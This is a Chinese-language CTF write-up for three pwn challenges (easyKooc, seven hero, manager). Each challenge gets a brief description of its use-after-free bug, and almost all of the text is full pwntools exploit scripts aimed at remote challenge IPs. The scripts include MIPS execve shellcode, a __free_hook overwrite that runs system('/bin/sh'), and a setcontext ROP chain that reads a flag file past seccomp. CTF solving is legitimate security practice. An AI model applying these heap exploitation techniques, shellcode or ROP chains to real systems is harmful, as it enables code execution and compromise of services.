easyKooc

简单的mips题目,静态地址,存在UAF漏洞,并且有RWX段,可执行shellcode。

利用UAF将shellcode写到可执行段上,然后修改got表跳过去执行即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
context.arch = 'mips'
#p = process(["qemu-mipsel-static", "-L", "./mipsel-linux-gnu", "./easyKooc"])
#p = gdb.debug("./easyKooc",' b *0x412140')
libc = ELF("./libc-2.23.so")
p = remote("121.36.166.138","8893")
def add(idx,data):
	p.recvuntil("Plz input your choice")
	p.sendline("1")
	p.recvuntil("Plz input your todo id!")
	p.sendline(str(idx))
	p.recvuntil("input your content")
	p.sendline(data)
def free(idx):
	p.recvuntil("Plz input your choice")
	p.sendline("2")
	p.recvuntil("Plz input your todo id!")
	p.sendline(str(idx))

code = '''
lui $t6,0x6e69
ori $t6,$t6,0x622f
sw $t6,28($sp)

lui $t7,0x6873
ori $t7,$t7,0x2f2f
sw $t7,32($sp)
sw $zero,36($sp)


la $a0,28($sp) 

addiu $a1,$zero,0
addiu $a2,$zero,0
addiu $v0,$zero,4011

syscall 0x40404 
'''
code = asm(code,arch='mips')
print len(code)
p.recvuntil("Plz input your motto!")
p.sendline('111')
p.recvuntil("gift for you: ")
stack = int(p.recvline()[:-1],16)
print hex(stack)
add(1,'1111')
add(2,'1111')
free(1)
free(2)
free(1)

add(0xf,p32(0x41213e-8))
add(0xe,p32(1))
add(0xd,p32(1))
add(0xc,'\x00'*2+code)


free(1)
free(2)
free(1)
add(4,p32(0x41204a-8))
add(5,'1')
add(6,'2')
add(7,'\x00'*0xe+p32(0x412140))
p.sendline("3")
p.interactive()

seven hero

2.29的题目,edit大小为0的时候,会将堆块free掉,但是不会清空指针,可以UAF。

先申请到标志位将其赋值得到gift函数的执行权限,得到libc地址。

再一次用UAF漏洞申请到__free_hook处修改其为system函数地址即可getshell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
from pwn import *


#context.log_level = "DEBUG"
context.terminal = ["tmux", "splitw", "-h"]

'''
p = process("/tmp/pwn", env={"LD_PRELOAD":"/tmp/libc.so.6"})
libc = ELF("/tmp/libc.so.6")
'''
p = remote("119.3.89.93","8015")
libc = ELF("./libc.so.6")
def read_choice(choice):
    p.sendlineafter("Input your choice:", str(choice))

def add(idx, size, content):
    read_choice(1)
    p.sendlineafter("please input index: ", str(idx))
    p.sendlineafter("please input size: ", str(size))
    p.sendafter("Please input content: ", content)

def free(idx):
    read_choice(3)
    p.sendlineafter("index: ", str(idx))
    # p.recvuntil("Success")

def edit(idx, size ,content = 0):
    read_choice(2)
    p.sendlineafter("index: ", str(idx))
    p.sendlineafter("Please input size: ", str(size))
    if content != 0:
        p.sendafter("content: ", content)


def show(idx):
    read_choice(4)
    p.sendlineafter("index: ", str(idx))
def gift(hack_string):
    read_choice(666)
    p.recvuntil("there is a gift: ")
    gift = p.recvuntil("\n")
    gift = gift[:-1]
    p.send(hack_string)
    return gift

def call():
    read_choice(5)
for i in range(0x9):
	add(i,0x18,'a')
for i in range(0x7):
	free(8-i)

edit(0,0)
#add(2,0x18,'\x00'*0x10)
edit(1,0)
show(1)
p.recvuntil("content: ")
heap = u64(p.recv(6)+b'\x00\x00')-0x270
print(hex(heap))
edit(1,0x18,p64(heap+0x250))
add(2,0x18,'a')
add(3,0x18,'a')
libc.address = int(gift('111'),16)-0x264140
print(hex(libc.address))
#gdb.attach(p)
add(4,0x50,'a')
add(5,0x50,'a')
edit(4,0)
edit(5,0)
edit(5,0x50,p64(libc.sym['__free_hook']))
gift('111')
gift(p64(libc.sym['system']))
add(0,0x28,'/bin/sh\x00')
free(0)
p.interactive()

manager

开启了seccomp保护,禁止exec系统调用。

漏洞点跟上一题一样,edit大小为0的时候,会将堆块free掉,但是不会清空指针,可以UAF。

首先用unsortbin进行leak libc地址。

接着leak出heap地址。

在堆中构造出假堆头,修改free的堆块fd指向该假堆块,利用其修改name指针地址为__free_hook

接着将__free_hook修改为setcontext,并在堆上写好相应的寄存器值以及rop串即可获取flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
from pwn import *
p = process("./pwn")
p = remote("122.112.231.25","8005")
libc = ELF("./pwn").libc
def add(num,name,size,data):
	p.recvuntil(">>>")
	p.sendline("1")
	p.recvuntil("Input Name of Staff:")
	p.send(name)
	p.recvuntil("Input Number of Staff:")
	p.sendline(str(num))
	p.recvuntil("Input len of Info:")
	p.sendline(str(size))
	p.recvuntil("get Info:")
	p.send(data)

def edit_name(num,name):
	p.recvuntil(">>>")
	p.sendline("2")
	p.recvuntil("Input Number:")
	p.send(str(num))
	p.recvuntil("Choice: 1.Edit Name 2.Edit Info\n > ")
	p.sendline(str(1))
	p.recvuntil("Input name:")
	p.send(name)
def edit_info(num,size,data):
	p.recvuntil(">>>")
	p.sendline("2")
	p.recvuntil("Input Number:")
	p.send(str(num))
	p.recvuntil("Choice: 1.Edit Name 2.Edit Info\n > ")
	p.sendline(str(2))
	p.recvuntil("Input len of Info:")
	p.sendline(str(size))
	p.recvuntil("Input info:")
def edit_info2(num,size,data):
	p.recvuntil(">>>")
	p.sendline("2")
	p.recvuntil("Input Number:")
	p.send(str(num))
	p.recvuntil("Choice: 1.Edit Name 2.Edit Info\n > ")
	p.sendline(str(2))
	p.recvuntil("Input len of Info:")
	p.sendline(str(size))
	p.recvuntil("Input info:")
	p.send(info)
def show(num):
	p.recvuntil(">>>")
	p.sendline("4")
	p.recvuntil("Input staff number:")
	p.send(str(num))
def free(num):
	p.recvuntil(">>>")
	p.sendline("3")
	p.recvuntil("Input Number of Staff:")
	p.sendline(str(num))



one =[0x45226,0x4527a,0xf0364,0xf1207]
p.recvuntil("Input String1:")
p.sendline("\x02\x01\x00")
p.recvuntil("Input String2:")
p.sendline("\x01\x26")


add(0,'a',0xf8,'aaaa')
add(1,'a',0x68,'aaaa')
add(2,'a',0x68,'aaaa')
free(0)
add(0,'a'*8,0xf8,'a')
show(0)

p.recvuntil("a"*8)
libc.address = u64(p.recv(6)+'\x00\x00')-0x3C4C68
print hex(libc.address)



stack = 0x10000000
pop_rdi = 0x0000000000021112 + libc.address
pop_rsi = 0x00000000000202f8 + libc.address
pop_rdx = 0x0000000000001b92 + libc.address
pop_rax = 0x000000000003a738 + libc.address
pop_rsp = 0x0000000000003838 + libc.address
syscall = 0x0000000000101597 + libc.address
ret = 0x1015B2 + libc.address



add(3,'a',0x58,'aaaa')


add(4,'a',0x68,'aaaa')
add(5,'a',0x68,'aaaa')
add(6,'a',0x68,'aaaa')
edit_info(4,0,'a')
free(5)
free(4)
add(4,'a',0x68,'\x90')
add(5,'a',0x68,'\x00'*0x58+'\x71')
show(4)
p.recvuntil('Info:')
heap = u64(p.recv(6)+'\x00\x00')-0x590
print hex(heap)


payload = ''
payload += p64(pop_rdi)
payload += p64(heap+0x918)
payload += p64(pop_rsi)
payload += p64(4)
payload += p64(pop_rdx)
payload += p64(4)
payload += p64(pop_rax)
payload += p64(2)
payload += p64(syscall)


payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(heap+0x500+0x8b8)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rax)
payload += p64(0)
payload += p64(syscall)


payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi)
payload += p64(heap+0x500+0x8b8)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(syscall)
payload += './flag\x00'


add(7,'a',0x68,'\x00'*0x68)
#add(1,'a',0x68,'\x00'*0xb+p64(libc.sym['setcontext'])+p64(0))
add(8,'a',0x68,p64(0)+p64(0x21)+p64(libc.sym['__free_hook']))
add(9,'a',0xf8,payload)
add(10,'\x00',0xf8,'\x00'*0x60+p64(heap+0x840)+p64(ret)+'\x00'*0x30+p64(heap+0x7b0))
edit_name(6,p64(libc.sym['setcontext']))
#gdb.attach(p,'b *$rebase(0x183B)\n b free')
free(10)
p.interactive()